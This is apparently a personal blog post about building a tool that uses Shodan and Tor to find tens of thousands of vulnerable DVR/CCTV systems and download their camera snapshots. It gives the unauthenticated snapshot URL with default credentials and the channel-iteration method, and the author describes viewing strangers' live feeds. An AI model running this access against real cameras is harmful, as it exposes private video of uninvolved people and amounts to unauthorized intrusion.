So I went on my daily browse on the netsec temple, reddit.com/r/netsec, to pay my respects as usual, pray to the hacking gods for the prosperity of my servers and offer my upvotes.
The gods were kind and the rewarded me with much fun. One fellow white hat hacker, Andrew Tierney, was blessed with the joy of vulnerability discovery. When I saw the article https://www.pentestpartners.com/blog/pwning-cctv-cameras/ https://www.reddit.com/r/netsec/comments/466jap/pwning_cctv_cameras/ I immediately knew what I had to do. I needed to find and exploit every single one of those DVR systems connected to the internet and provide the world a simple-easy to understand proof of concept, prooving that these things are the devils work, and we must not install them in our home.
Its also one hell of a way to show off my awesome coding skills given to me by the kind grayhat gods.
So if you read the article on this excellent sample of human stupidity, you will see lots and lots of vulnerabilities including:
- Defaut username is: admin/[blank]
- Remote/Web Root shell
- Client site – Javascript authentication
- Each DVR is sending daily screenshots to a specific email (the creator of the firmware)
In other words, this DVR system, is worse than the deliberately vulnerable applications that young netsec students are trained on.
The only problem is finding them. Fortunately, as Andrew states, you can easily find those devices in Shodan.io. But we want to find each and every one of them. And we don’t have a Shodan premium account.
One side note is, I have been working on multiple libraries. I didn’t intent on releasing them, but this POC would be faster to build If I used them. If nothing else I will write them better if I release them. You know, so that people won’t make fun of my hacky code (please don’t).
Fortunately, I was already working on a Shodan.io Scraper called ShodanScanner, which I also released as open source on my github page here.
So my thought was I will write my first program to use ShodanScanner and I will use it to download all the screenshots for all vulnerable web cameras Shodan can detect.
ShodanScanner in turn also depends on another library that I wrote called TorRange uploaded here.
TorRange is a library that can create multiple threads and consume large input of any size efficiently. A Tor Instance is tied to each thread if needed and the thread can control the connection (Restart circuit/change ip etc). The process can be stopped and resumed at any point.
All libraries are Maven projects, although not uploaded yet to Maven Central. A bit to much for a simple POC (Proof of consept), but that’s the way I program. After all I am a Software Engineer. The actual POC is 150 lines. The rest is reusuable libraries.
So the only thing we have to do is fire up ShodanScanner and tell it to scan for: JAWS/1.0.
So back to our cameras. The screenshot is easy to download. You know, considering the utter lack of sane authentication.
I connected to a couple of cameras:
Please note that the above is live video of the cameras. You can basically see the live feed for more than 40 000 cameras worldwide.
I quicly found out the link to download the image which is:
http://ip/cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&d=1
http://ip/cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&d=1
chn parameter is incremental. You can download screenshot for each camera but increasing the chn by one.
You know when you are finished from the response headers, Content-Disposition header). When the cameras finish the filename of the attachment is camera_0_[…]. If I get that I know there are no more cameras and I move on to the next. And if you didn’t read the article, this firmware uses javascript authentication. If we were on a browser we would set the appropriate cookies (username, password) with any values, or disable javascript all together. When crawling with Java, javascript authentication = no authentication.
From there my task was easy. ccSnapTv was build. I told my brother Rafael about it, and asked him to test it. He made 2 excellent suggestions, store the images per country and create a POC Video.
I really liked the POC video idea. You can babble for hours trying to explain to a non technical person, about a concept, but there is nothing better than visual representation of the idea. And a video where cameras are hacked live, is the best presentation you can have.
So here is the video:
Source on github:
https://github.com/nikos-glikis/ccSnapTv